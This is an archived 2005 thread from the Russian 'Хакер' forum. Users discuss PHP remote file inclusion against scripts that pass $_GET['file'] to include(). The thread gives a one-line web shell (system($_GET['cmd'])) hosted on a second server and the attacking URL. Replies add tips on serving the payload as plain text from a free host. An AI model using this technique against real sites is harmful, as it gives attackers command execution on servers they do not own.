Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Include-баг

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Include-баг
Имя
Сообщение << Старые топики   Новые топики >>
Include-баг - 2005-04-04 02:46:49   
cybermind

Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13
 Народ, объясните насчёт инклуд-бага, я кое-чего не понимаю..

Вот, допустим есть бажный скрипт со строкой include($_GET[''file'']);
Типа скрипту передаётся файл, который нужно выполнить. Например, так:

www.site1.ru/index.phtml?file=guestbook.php

И тогда, чтоб стать батькой на сайте мы создаём на другом серваке свой guestbook.php со строкой system($_GET[''cmd'']);, а затем пишем:

www.site1.ru/index.phtml?file=http://site2.ru/guestbook.php

Теперь цитирую статью на phpclub.ru: "сервер выполнит HTTP-запрос, скачает страницу, и запишет в переменную как из обычного файла"

Вопрос: каким боком site2.ru даст site1.ru исходники моего guesbook.php???
Post #: 1
Include-баг - 2005-04-04 09:29:25   
deZZineSS

Сообщений: 73
Оценки: 0
Присоединился: 2004-08-24 21:32:20
 include($_GET['file']); <—— Вот таким =)))
Post #: 2
Include-баг - 2005-04-04 09:39:40   
Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
 Потому, что если в include($file) $file будет начинаться с "http://", то будет инклуд с внешнего сервера. То есть, ты подставляешь вместо guestbook.php свой http://site2.ru/guestbook.php и скрипт его инклудит. Как ты понимаешь, на site2.ru должна быть отключена интерпретация php, иначе ничего не выйдет.
Post #: 3
Include-баг - 2005-04-04 15:46:41   
cybermind

Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13
quote:

—————-<BR>Цитата: Дата:04.04.2005 9:39:40, Автор:Lex_Voodoo ::
Как ты понимаешь, на site2.ru должна быть отключена интерпретация php, иначе ничего не выйдет.
—————-



Ааа! Понял, почему у меня ничего не получалось…
Lex, как всегда, выручил =)
А народ.ру сойдёт?
Post #: 4
Include-баг - 2005-04-04 16:22:02   
Lex_Voodoo

Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
 Ага, думаю, сойдет!
Но можно сделать проще - *.php переименовать в *.txt [sm=1.gif]

З.Ы.
>> Lex, как всегда, выручил
Ну так эта… PHP - моя стихия [sm=9.gif]
Рад помочь [sm=sm203.gif]
Post #: 5
Страниц:  [1]
Все форумы >> [В Сети] >> Include-баг







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.